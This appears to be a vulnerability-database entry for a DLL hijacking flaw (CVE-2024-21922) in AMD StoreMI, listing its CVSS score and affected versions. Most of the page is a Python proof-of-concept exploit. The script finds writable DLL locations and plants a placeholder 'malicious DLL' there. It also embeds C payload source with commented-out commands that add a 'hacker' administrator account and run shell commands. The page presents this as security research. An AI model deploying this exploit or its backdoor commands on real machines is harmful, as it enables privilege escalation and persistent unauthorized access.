A DLL hijacking vulnerability in AMD StoreMI™ could allow an attacker to achieve privilege escalation, potentially resulting in arbitrary code execution.
CVSS Details
CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
Configurations (Affected Products)
No configuration data available.
AMD StoreMI < 2.0.0.0288
AMD StoreMI 某些早期版本
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-21922 DLL Hijacking PoC
# Target: AMD StoreMI
# This PoC demonstrates the DLL hijacking vulnerability
import os
import ctypes
import shutil
from pathlib import Path
# Malicious DLL source code (to be compiled as DLL)
MALICIOUS_DLL_SOURCE = '''
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Create a backdoor or execute malicious code here
// This code runs with AMD StoreMI's privileges
// Example: Create admin user (for demonstration)
// system("net user hacker P@ssw0rd123 /add");
// system("net localgroup administrators hacker /add");
// Log exploitation attempt
HANDLE hFile = CreateFileA(
"C:\\\\Temp\\\\cve_2024_21922_poc.log",
GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile != INVALID_HANDLE_VALUE) {
const char* msg = "[+] CVE-2024-21922 DLL hijacking triggered\\n";
DWORD written;
WriteFile(hFile, msg, strlen(msg), &written, NULL);
CloseHandle(hFile);
}
// Execute payload - reverse shell, privilege escalation, etc.
// WinExec("cmd.exe /c whoami > C:\\\\Temp\\\\priv_esc.txt", 0);
}
return TRUE;
}
'''
def create_malicious_dll(dll_path):
"""Generate malicious DLL for exploitation"""
print(f"[*] Creating malicious DLL at: {dll_path}")
# In real scenario, compile the C code above as a DLL
# For demonstration, create a placeholder
with open(dll_path, 'wb') as f:
f.write(b'MZ' + b'\x00' * 58 + b'PE\x00\x00')
print(f"[+] Malicious DLL created")
def find_vulnerable_location(storeMI_path):
"""Find potential DLL hijacking locations"""
vulnerable_paths = [
os.path.join(storeMI_path, 'amdstorMI.dll'),
os.path.join(storeMI_path, 'amdstoreMI.dll'),
os.path.join(storeMI_path, 'StoreMI.dll'),
'C:\\Windows\\System32\\amdstorMI.dll',
'C:\\Windows\\System32\\amdstoreMI.dll'
]
return [p for p in vulnerable_paths if os.access(os.path.dirname(p), os.W_OK)]
def exploit_cve_2024_21922(storeMI_path, target_dll):
"""
CVE-2024-21922 Exploitation Script
Attack Vector:
1. Identify AMD StoreMI installation directory
2. Plant malicious DLL with legitimate DLL name
3. Wait for user to launch AMD StoreMI
4. Malicious DLL loads with elevated privileges
"""
print("[*] CVE-2024-21922 DLL Hijacking PoC")
print("[*] Target: AMD StoreMI")
# Step 1: Find vulnerable locations
vulnerable_locs = find_vulnerable_location(storeMI_path)
if not vulnerable_locs:
print("[-] No writable DLL locations found")
return False
print(f"[+] Found {len(vulnerable_locs)} potential injection points")
# Step 2: Create malicious DLL
for loc in vulnerable_locs:
print(f"[*] Attempting injection at: {loc}")
create_malicious_dll(loc)
print(f"[+] Malicious DLL planted at {loc}")
print("[+] PoC complete - malicious DLL(s) planted")
print("[*] Payload will execute when AMD StoreMI is launched")
return True
if __name__ == "__main__":
# Default AMD StoreMI installation path
default_path = r'C:\Program Files\AMD\AMD StoreMI'
target_dll = 'amdstorMI.dll'
exploit_cve_2024_21922(default_path, target_dll)